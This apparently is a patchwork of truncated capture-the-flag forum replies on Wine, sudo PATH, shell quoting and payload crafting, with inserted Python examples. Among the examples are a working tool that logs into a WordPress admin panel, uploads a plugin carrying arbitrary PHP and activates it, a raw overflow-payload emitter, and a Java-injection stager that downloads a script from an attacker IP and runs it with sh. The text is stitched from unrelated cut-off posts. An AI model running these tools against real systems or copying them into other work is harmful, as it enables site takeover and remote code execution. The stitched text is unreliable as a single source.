At least, I'm not aware of anyone who solved it with Linux/MacOS. If I remember correctly, the required tools don't work with the *NIX-variant of "the framework", and I also didn't get it to work unde…
I played around with wine and the required tools, but couldn't really get them to run the way they worked on Windows:
* the latest release of y_______l.n__ refuses to work under wine and mono, and instead crashes with unhandled exceptions. One migh…
Due to the technology in use, you will need to use Windows. I haven't tried whether it's possible to use the exploit from within Wine, though, so it might be worth a try. I might check tonight, when I'm at my PC.
As Taz already mentioned: Having a spare hardware device is your best choice.
To gather initial information about the USB stick, I can suggest using usblock: https://github.com/cddmp/usblock
When usblock is running, and you insert any USB device, it…
There is no authentication required for this part. I've just checked the part you are stuck at from within my CTF Kali VM and can enumerate just fine.
Maybe you can try switching to another server instance or VPN zone, as you already ruled out (acti…
You are on the right track, and this is basically the way to go. In the beginning, it requires a slight twist, though.
Do you already know what other internal resources there might be?
Just an assumption:
Many websites/CMSes/blog-engines automatically convert "straight" quotes to “typographic” quotes. And those are completely different characters which bash (or your shell in general) handles differ…
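As an added illustration (not part of the post above), the Python below shows why a command pasted from such a page falls apart: shlex.split follows POSIX sh quoting rules, so the typographic quotes are treated as ordinary word characters rather than as quoting, exactly as bash does, and the normalizer maps the common smart-quote code points back to ASCII before the command is run. The pasted command is a constructed example.

```python
import shlex
import unicodedata

# Typographic quotes that "smart quote" filters commonly substitute, mapped back to
# the ASCII quotes a POSIX shell actually treats as quoting characters.
SMART_QUOTES = {
    "\u201c": '"',  # LEFT DOUBLE QUOTATION MARK
    "\u201d": '"',  # RIGHT DOUBLE QUOTATION MARK
    "\u201e": '"',  # DOUBLE LOW-9 QUOTATION MARK
    "\u2018": "'",  # LEFT SINGLE QUOTATION MARK
    "\u2019": "'",  # RIGHT SINGLE QUOTATION MARK
    "\u201a": "'",  # SINGLE LOW-9 QUOTATION MARK
}
_TRANSLATION = str.maketrans(SMART_QUOTES)

# Constructed example of a command after a blog engine rewrote its quotes.
PASTED = "echo \u201chello world\u201d"


def find_smart_quotes(cmd: str) -> list[tuple[int, str, str]]:
    """(offset, character, Unicode name) for every typographic quote in cmd."""
    return [(i, ch, unicodedata.name(ch)) for i, ch in enumerate(cmd) if ch in SMART_QUOTES]


def normalize_quotes(cmd: str) -> str:
    """Replace typographic quotes with the ASCII quotes the shell understands."""
    return cmd.translate(_TRANSLATION)


def shell_words(cmd: str) -> list[str]:
    """Split cmd the way a POSIX shell would (shlex implements sh quoting rules)."""
    return shlex.split(cmd)


if __name__ == "__main__":
    for offset, ch, name in find_smart_quotes(PASTED):
        print(f"offset {offset}: U+{ord(ch):04X} {name}")
    print(shell_words(PASTED))                    # ['echo', '“hello', 'world”']
    print(shell_words(normalize_quotes(PASTED)))  # ['echo', 'hello world']
```

Running find_smart_quotes over a pasted command before executing it is a quick way to spot the problem; the offsets point straight at the characters that look like quotes but are not.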
You would need to change the PATH for the sudo environment, not for the sudo call:
Not: PATH=bla sudo ...
But: sudo PATH=bla ...
But AFAIK, this was explicitly forbidden by the sudo config.
For trying out new OSes, I highly suggest using virtual machines. They allow you to take snapshots, so that you can completely brick the system and always go back to a clean state without having to reinstall the whole system.
Since you want to…
IKR. Wondering why the "ping back" for foothold rarely works, while the other reply comes back in a somewhat timely manner. Got it working once and know the user, but now it failed for the last 20 (or so) attempts…
It's a tad bit clunky, but you need to use the stdout buffer:
python3 -c "import sys; sys.stdout.buffer.write(b'A'*5 + b'\xde\xad\xc0\xde')" | xxd
00000000: 4141 4141 41de adc0 de                   AAAAA....
When using pwntools, you usual…
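An added example expanding on the post above (not code from the poster): the reason for sys.stdout.buffer is that print() and sys.stdout.write() take str and go through a text encoder, so the bytes de ad c0 de, which are not valid UTF-8, either raise on decoding or get their repr (b'AAAAA\xde...' with literal backslashes) written out as text. Writing to the underlying binary buffer sends the bytes unchanged. p32 here is a stand-in for pwntools' p32 (little-endian 32-bit packing via struct) so the file runs without pwntools; the payload layout is the one from the xxd output in the post.

```python
import struct
import sys


def p32(value: int) -> bytes:
    """Pack a 32-bit little-endian integer; same result as pwntools' p32()."""
    return struct.pack("<I", value)


def build_payload() -> bytes:
    """Payload from the post: five bytes of padding, then the bytes de ad c0 de."""
    return b"A" * 5 + p32(0xDEC0ADDE)


def is_utf8(data: bytes) -> bool:
    """Whether the bytes would survive Python's text layer unchanged."""
    try:
        data.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return True


def emit(payload: bytes, out=None) -> int:
    """Write raw bytes to a binary stream (default: the byte buffer under sys.stdout).

    print(payload) would write the text repr b'AAAAA\\xde...' (literal backslashes),
    and sys.stdout.write(payload) rejects bytes outright; the buffer takes them as-is.
    """
    out = sys.stdout.buffer if out is None else out
    written = out.write(payload)
    out.flush()
    return written


if __name__ == "__main__":
    # Pipe into xxd (or nc / the target binary) to see the 9 raw bytes.
    emit(build_payload())
```

The same applies to any non-ASCII byte in a payload (addresses, shellcode, overflow padding): as soon as it passes through a str, the encoding step decides what arrives at the target, not you.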
Well, yes and no. Java in particular (but also other server-side languages in general) doesn't like complex payloads. Often, it is better to download (and then execute) a shell script to the target machine, and make the scrip…
Haven't looked into the code, but it's most likely possible via the xmlrpc.php endpoint. But it might as well be that MSF just does the whole:
* log into wp-admin
* grab CSRF token for plugins upload
* upload plugin
* activate p…
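The four steps listed above, as an added example written here in Python (this is neither Metasploit's code nor the poster's; it is one way to drive the same wp-admin flow by hand). It assumes the standard WordPress paths and form fields: wp-login.php with log/pwd, plugin-install.php?tab=upload rendering a _wpnonce hidden field, update.php?action=upload-plugin taking a pluginzip file, and the "Activate Plugin" link on the result page. The base URL, credentials, slug and the two HTML fragments are constructed for the example, the plugin body is left to the caller, and the requests package is only needed for the network function; the offline helpers (zip building, nonce parsing) run stand-alone.

```python
import io
import re
import zipfile
from urllib.parse import unquote

# Nonce hidden field as wp_nonce_field() renders it, and the "Activate Plugin" link
# that wp-admin/update.php prints after a successful upload.
UPLOAD_NONCE_RE = re.compile(r'name="_wpnonce"\s+value="([0-9a-f]+)"')
ACTIVATE_RE = re.compile(
    r'plugins\.php\?action=activate&(?:amp;)?plugin=([^&"]+)&(?:amp;)?_wpnonce=([0-9a-f]+)'
)

# Constructed HTML fragments standing in for the two wp-admin pages (not captured from a real site).
SAMPLE_UPLOAD_PAGE = (
    '<form method="post" enctype="multipart/form-data" action="update.php?action=upload-plugin">'
    '<input type="hidden" id="_wpnonce" name="_wpnonce" value="3f2a9c1d7e" />'
    '<input type="file" name="pluginzip" /></form>'
)
SAMPLE_RESULT_PAGE = (
    '<a href="http://blog.example/wp-admin/plugins.php?action=activate'
    '&amp;plugin=demo%2Fdemo.php&amp;_wpnonce=a1b2c3d4e5" class="button">Activate Plugin</a>'
)


def build_plugin_zip(slug: str, php_body: str) -> bytes:
    """In-memory zip of <slug>/<slug>.php carrying the header WordPress needs to list it."""
    source = f"<?php\n/*\nPlugin Name: {slug}\n*/\n{php_body}\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{slug}/{slug}.php", source)
    return buf.getvalue()


def zip_entries(data: bytes) -> list[str]:
    """File names inside a zip held in memory (used to check what was built)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def extract_upload_nonce(html: str) -> str:
    """CSRF token of the upload form (assumes the first _wpnonce on the page is that form's)."""
    m = UPLOAD_NONCE_RE.search(html)
    if not m:
        raise ValueError("no _wpnonce field found; not logged in or page layout differs")
    return m.group(1)


def extract_activation_link(html: str) -> tuple[str, str]:
    """(plugin file, activation nonce) from the post-upload result page."""
    m = ACTIVATE_RE.search(html)
    if not m:
        raise ValueError("no activation link found; upload probably failed")
    return unquote(m.group(1)), m.group(2)


def install_and_activate(base: str, user: str, password: str, slug: str, php_body: str) -> str:
    """Drive the wp-admin flow from the post. Needs network access and the requests package."""
    import requests  # imported here so the offline helpers work without it

    s = requests.Session()
    # 1. log into wp-admin
    s.post(f"{base}/wp-login.php", data={"log": user, "pwd": password, "wp-submit": "Log In",
                                          "redirect_to": f"{base}/wp-admin/", "testcookie": "1"})
    # 2. grab the CSRF token for the plugin upload form
    nonce = extract_upload_nonce(s.get(f"{base}/wp-admin/plugin-install.php?tab=upload").text)
    # 3. upload the plugin zip
    r = s.post(f"{base}/wp-admin/update.php?action=upload-plugin",
               data={"_wpnonce": nonce, "install-plugin-submit": "Install Now"},
               files={"pluginzip": (f"{slug}.zip", build_plugin_zip(slug, php_body), "application/zip")})
    # 4. activate it via the link on the result page
    plugin, act_nonce = extract_activation_link(r.text)
    s.get(f"{base}/wp-admin/plugins.php",
          params={"action": "activate", "plugin": plugin, "_wpnonce": act_nonce})
    return plugin
```

Both nonces are per-session CSRF tokens, which is why the login has to happen in the same Session object that fetches the form and submits the upload; a nonce scraped from one cookie jar is useless in another.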
As always with Java in particular (but also other server-side languages in general): Don't try to build too complex payloads. Often, it is better to download (and then execute) a shell script to the target machine, and make …
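This post and the earlier "yes and no" reply make the same point, so one added example serves both; it is not the poster's code. The usual reason Java payloads break is that Runtime.exec(String) splits the command string with StringTokenizer on whitespace only, so shell quoting, pipes and semicolons are never interpreted and end up verbatim inside argv. The Python below emulates that split, compares it with what a POSIX shell would produce, and shows that a plain two-step stager (fetch the script, then run it) survives while a quoted one-liner does not. The URL and path are hypothetical placeholders.

```python
import shlex

# java.util.StringTokenizer default delimiters, which is what Runtime.exec(String) uses.
JAVA_DELIMS = " \t\n\r\f"


def java_exec_tokens(command: str) -> list[str]:
    """Emulate how Java's Runtime.exec(String) turns a command string into argv.

    Only whitespace separates tokens; quotes, '|', ';' and redirections are kept
    verbatim inside the tokens, so no shell ever gets a chance to interpret them.
    """
    tokens, cur = [], []
    for ch in command:
        if ch in JAVA_DELIMS:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def payload_survives_exec(command: str) -> bool:
    """True when Java's split gives the same argv a POSIX shell would produce."""
    return java_exec_tokens(command) == shlex.split(command)


def stager_commands(script_url: str, dest: str) -> list[str]:
    """Two quote-free commands: fetch the script, then execute it.

    Each one tokenises identically in Java and in a shell, so the complex logic
    can live in the script instead of in the injected command.
    """
    return [f"curl -s -o {dest} {script_url}", f"sh {dest}"]


if __name__ == "__main__":
    # Constructed examples; the IP and path are placeholders.
    one_liner = 'bash -c "curl http://10.10.14.5/s.sh | sh"'
    print(java_exec_tokens(one_liner))       # quotes end up inside argv entries
    print(payload_survives_exec(one_liner))  # False
    for cmd in stager_commands("http://10.10.14.5/s.sh", "/tmp/s.sh"):
        print(cmd, payload_survives_exec(cmd))  # True, True
```

The same check is useful for other exec-style sinks: if the target's runtime tokenises differently from a shell, keep the injected command to plain whitespace-separated words and move everything else into the downloaded script.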